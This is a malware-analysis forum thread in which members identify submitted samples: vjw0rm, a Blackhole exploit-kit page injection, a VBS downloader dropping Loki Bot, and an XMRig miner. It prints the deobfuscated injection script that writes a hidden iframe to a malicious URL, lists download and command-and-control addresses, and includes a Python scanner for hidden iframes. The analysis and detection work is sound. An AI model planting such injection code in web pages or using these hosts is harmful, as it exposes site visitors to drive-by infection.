Malware collection

Forum for analysis and discussion about malware.
ikolor
Posts: 281
Joined: Thu Jun 05, 2014 2:20 pm
Location: Poland

Re: Malware collection

Post by ikolor » Wed Jul 12, 2017 3:30 pm

This is not my file. Only from someone.

https://www.virustotal.com/en/file/342a ... /analysis/

Antelox
Posts: 176
Joined: Sun Mar 21, 2010 10:38 pm
Contact:

Re: Malware collection

Post by Antelox » Wed Jul 12, 2017 5:15 pm

ikolor wrote:This is not my file. Only from someone.

https://www.virustotal.com/en/file/342a ... /analysis/
vjw0rm

hxxp://lipiec.ftpserver.biz:1742/Vre
BR,

Antelox

Antelox
Posts: 176
Joined: Sun Mar 21, 2010 10:38 pm
Contact:

Re: Malware collection

Post by Antelox » Wed Jul 12, 2017 5:43 pm

ikolor wrote:Is it possible to get more information from this HTML file?

https://www.virustotal.com/en/file/f9db ... 499847827/
This is an old infected page by Blackhole EK.

The malicious iframe, after deobfuscation, looks like:

if (document.getElementsByTagName('body')[0]) {
    iframer();
} else {
    // body not parsed yet: write the hidden 10x10 iframe directly into the document
    document.write("<iframe src='http://zihemmi.ru/count26.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}
function iframer() {
    // same hidden 10x10 iframe, built via the DOM and appended to <body>
    var f = document.createElement('iframe');
    f.setAttribute('src', 'http://zihemmi.ru/count26.php');
    f.style.visibility = 'hidden';
    f.style.position = 'absolute';
    f.style.left = '0';
    f.style.top = '0';
    f.setAttribute('width', '10');
    f.setAttribute('height', '10');
    document.getElementsByTagName('body')[0].appendChild(f);
}

http://zihemmi.ru/count26.php
BR,

Antelox
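A defender-side check for the kind of injection quoted above, added here as an example that is not part of the thread and not code from the sample: it scans page HTML for iframes that are hidden by CSS, sized too small to be seen, or emitted from inside a script block, and reports each with the reasons it was flagged. The sample page is constructed (the deobfuscated snippet plus one ordinary embed for contrast), and the 20-pixel "tiny" threshold is an assumption.

```python
import re

# Constructed sample page (not the thread's actual capture): the deobfuscated
# Blackhole injection quoted above, plus one benign embed for contrast.
SAMPLE_PAGE = """<html><body><p>hello</p>
<script>
if (document.getElementsByTagName('body')[0]) { iframer(); } else {
document.write("<iframe src='http://zihemmi.ru/count26.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}
</script>
<iframe src='https://example.com/video' width='640' height='360'></iframe>
</body></html>"""

SCRIPT_RE = re.compile(r"<script\b[^>]*>.*?</script>", re.IGNORECASE | re.DOTALL)
IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
ATTR_RE = re.compile(r"""([a-zA-Z-]+)\s*=\s*(?:'([^']*)'|"([^"]*)"|([^\s>'"]+))""")

TINY_PX = 20  # assumption: a frame at or below this size is not meant to be seen


def parse_attrs(tag_text):
    """Return a lowercase-keyed dict of attributes from one raw <iframe ...> tag."""
    attrs = {}
    for m in ATTR_RE.finditer(tag_text):
        attrs[m.group(1).lower()] = next(g for g in m.groups()[1:] if g is not None)
    return attrs


def px(value):
    """Parse '10' or '10px' to an int; return None for percentages or missing values."""
    m = re.fullmatch(r"\s*(\d+)(?:px)?\s*", value or "")
    return int(m.group(1)) if m else None


def suspicious_reasons(attrs, in_script):
    """List the traits that make one iframe look like an injected, invisible frame."""
    reasons = []
    style = attrs.get("style", "").replace(" ", "").lower()
    if "visibility:hidden" in style or "display:none" in style:
        reasons.append("hidden via CSS")
    w, h = px(attrs.get("width")), px(attrs.get("height"))
    if w is not None and h is not None and w <= TINY_PX and h <= TINY_PX:
        reasons.append(f"tiny dimensions ({w}x{h})")
    if in_script:
        reasons.append("written from script")
    return reasons


def find_hidden_iframes(html):
    """Scan raw HTML (including iframe markup inside script strings) and return findings."""
    script_spans = [m.span() for m in SCRIPT_RE.finditer(html)]
    findings = []
    for m in IFRAME_RE.finditer(html):
        in_script = any(s <= m.start() < e for s, e in script_spans)
        attrs = parse_attrs(m.group(0))
        reasons = suspicious_reasons(attrs, in_script)
        if reasons:
            findings.append({"src": attrs.get("src", ""), "reasons": reasons})
    return findings


if __name__ == "__main__":
    for hit in find_hidden_iframes(SAMPLE_PAGE):
        print(hit["src"], "->", ", ".join(hit["reasons"]))
```

The scan works on the raw text rather than a parsed DOM on purpose: the injected tag only exists as a string argument to `document.write` until the browser runs the script, so a DOM-based check on the static file would miss it. Run it over the raw HTML of the captured page; the 640x360 embed with no hiding style is left alone, while the 10x10 hidden frame is reported with all three traits.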

ikolor
Posts: 281
Joined: Thu Jun 05, 2014 2:20 pm
Location: Poland

Re: Malware collection

Post by ikolor » Thu Jul 13, 2017 11:50 am

Thank you a lot for analyzing this website.

https://www.virustotal.com/en/file/fd9e ... 499946518/

Antelox
Posts: 176
Joined: Sun Mar 21, 2010 10:38 pm
Contact:

Re: Malware collection

Post by Antelox » Thu Jul 13, 2017 12:11 pm

ikolor wrote:Thank you a lot for analyzing this website.

https://www.virustotal.com/en/file/fd9e ... 499946518/
Same shit as the one with SHA256: b9e2390f54ebfe328452d8b79d84b0d1869d27ade8c8819f519ad2100bfb46d5

BR,

Antelox

ikolor
Posts: 281
Joined: Thu Jun 05, 2014 2:20 pm
Location: Poland

Re: Malware collection

Post by ikolor » Thu Jul 13, 2017 2:18 pm

Antelox
Posts: 176
Joined: Sun Mar 21, 2010 10:38 pm
Contact:

Re: Malware collection

Post by Antelox » Thu Jul 13, 2017 3:54 pm

ikolor wrote:OK, and this. This is my hunt.

https://www.virustotal.com/en/file/df65 ... 499955431/
This is a VBS downloader which downloads another VBS from: https://paste.ee/r/zE7Z8/0

The second VBS drops Loki Bot.

C2:

hxxp://soundblast.club/sound/sound.php
BR,

Antelox

ikolor
Posts: 281
Joined: Thu Jun 05, 2014 2:20 pm
Location: Poland

Re: Malware collection

Post by ikolor » Thu Jul 13, 2017 7:23 pm

xors
Posts: 145
Joined: Mon May 23, 2016 2:01 am

Re: Malware collection

Post by xors » Thu Jul 13, 2017 8:55 pm

Probably a miner
@xorsthingsv2

Antelox
Posts: 176
Joined: Sun Mar 21, 2010 10:38 pm
Contact:

Re: Malware collection

Post by Antelox » Thu Jul 13, 2017 10:55 pm

Yep, it's XMRig miner.

ETPRO POLICY XMRig CoinMiner Usage

C2:

xmr.pool.minergate.com:45560
Email:

testfilatovmarafon@gmail.com
The Github page of the project: https://github.com/xmrig/xmrig

BR,

Antelox
